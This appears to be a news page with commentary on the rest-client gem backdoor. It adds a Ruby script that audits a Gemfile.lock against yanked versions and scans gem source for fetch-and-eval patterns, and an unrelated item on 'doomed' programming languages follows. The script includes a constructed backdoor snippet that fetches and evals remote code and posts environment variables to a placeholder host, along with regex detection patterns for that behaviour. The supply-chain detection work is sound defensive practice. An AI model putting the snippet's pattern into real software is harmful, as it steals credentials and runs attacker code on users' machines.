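The Ars story above on package-repository supply chain attacks and this ZDNet report on the rest-client backdoor describe the same failure mode from two angles: a trusted publishing account is taken over, and the poisoned version fetches a second stage, eval's it, and ships the victim's environment variables to a remote host. The Ruby script below is an added example, not code from ZDNet, RubyGems, Ars or the rest-client project. It does the two things a practitioner does after such an advisory: it checks a Gemfile.lock against a denylist of yanked versions, and it runs a heuristic scan over gem source for the fetch-and-eval plus environment-enumeration pattern described above. The rest-client versions in the denylist are the four yanked in the August 2019 incident; the Gemfile.lock and the two source snippets are constructed for the demonstration, the example.invalid hosts are placeholders, and the regex heuristics are assumptions that will also flag legitimate HTTP clients as low risk.

```ruby
# Added example (not from the page, ZDNet, RubyGems or rest-client):
# audit a Gemfile.lock against yanked versions and heuristically scan gem
# source for the exfiltrate-and-eval pattern. Heuristics are assumptions.

# Known-bad versions. The rest-client entries are the four versions yanked in
# August 2019; extend this map from RubyGems advisories for other gems.
MALICIOUS_GEMS = {
  "rest-client" => %w[1.6.10 1.6.11 1.6.12 1.6.13],
}.freeze

# Parse the "specs:" block of a Gemfile.lock into { name => version }.
# Spec lines are indented exactly four spaces ("    name (version)");
# their dependency constraints are indented six spaces and are skipped.
def parse_lockfile(text)
  specs = {}
  in_specs = false
  text.each_line do |line|
    if line.match?(/\A\s*specs:\s*\z/)
      in_specs = true
      next
    end
    in_specs = false if in_specs && line.match?(/\A\S/) # next top-level section
    next unless in_specs
    if (m = line.match(/\A {4}([^\s(]+) \(([^)]+)\)\s*\z/))
      specs[m[1]] = m[2]
    end
  end
  specs
end

# Return [[name, version], ...] for every locked gem that is on the denylist.
def audit_lockfile(text)
  parse_lockfile(text).select { |name, ver| MALICIOUS_GEMS.fetch(name, []).include?(ver) }.to_a
end

# Heuristic source scan. The reported backdoor fetched code over HTTP and
# eval'd it, and posted the environment (credentials included) to a remote
# host, so "network fetch" together with "eval" is scored high. Any single
# hit alone (e.g. a legitimate HTTP client) is only low risk.
SUSPICIOUS = [
  [/\beval\s*\(/,                                   "eval of dynamic input"],
  [/Net::HTTP|open-uri|URI\.open|OpenURI/,          "network fetch"],
  [/\bENV\.(to_h|to_a|each|map|select|inspect)\b/,  "environment enumeration"],
  [/\b(cookie|set-cookie)\b/i,                      "cookie handling"],
].freeze

def scan_source(src)
  findings = SUSPICIOUS.select { |re, _| src.match?(re) }.map(&:last)
  risk =
    if findings.include?("eval of dynamic input") && findings.include?("network fetch")
      :high
    elsif findings.empty?
      :none
    else
      :low
    end
  { findings: findings, risk: risk }
end

# Constructed Gemfile.lock for the demonstration (not from any real project).
SAMPLE_LOCKFILE = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      mime-types (3.3)
        mime-types-data (~> 3.2015)
      rest-client (1.6.13)
        mime-types (>= 1.16, < 4.0)

  PLATFORMS
    ruby

  DEPENDENCIES
    rest-client
LOCK

# Constructed snippets: one mimicking the reported behaviour, one benign.
# They are scanned as text, never executed; example.invalid is a placeholder.
BACKDOOR_SAMPLE = <<~'RUBY'
  require "net/http"
  body = Net::HTTP.get(URI("https://example.invalid/raw/stage2")) rescue nil
  eval(body) if body
  Net::HTTP.post_form(URI("https://example.invalid/collect"), "env" => ENV.to_h.to_s)
RUBY

BENIGN_SAMPLE = <<~'RUBY'
  require "json"
  def parse_body(body)
    JSON.parse(body)
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  audit_lockfile(SAMPLE_LOCKFILE).each { |name, ver| puts "DENYLISTED #{name} #{ver}" }
  { "backdoor" => BACKDOOR_SAMPLE, "benign" => BENIGN_SAMPLE }.each do |label, src|
    r = scan_source(src)
    puts "#{label}: risk=#{r[:risk]} findings=#{r[:findings].inspect}"
  end
end
```

Pointing `parse_lockfile` at a real lockfile (`File.read("Gemfile.lock")`) and `scan_source` at each installed gem's files under `Gem.dir` turns this into a quick post-advisory sweep. It catches only known-bad versions and the crude fetch-and-eval shape; the durable fix is what HD Moore calls for above, mandatory MFA on publisher accounts and signed releases, so a stolen password or API token is not enough to push a new version.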

Programming

'5 Programming Languages That Are Probably Doomed' (dice.com) 390

An anonymous reader shares a report: Not all programming languages endure forever. In fact, even the most popular ones inevitably crumble away, as new generations of developers embrace other languages and frameworks they find easier to work with. In order to determine which programming languages are likely doomed in the medium- to long-term, we looked at the popularity rankings by TIOBE and RedMonk, as well as Dice's own database of job postings. If your career is based on any of the following languages, we suggest diversifying your skill-set at some point: Ruby, Haskell, Objective-C, R, and Perl.
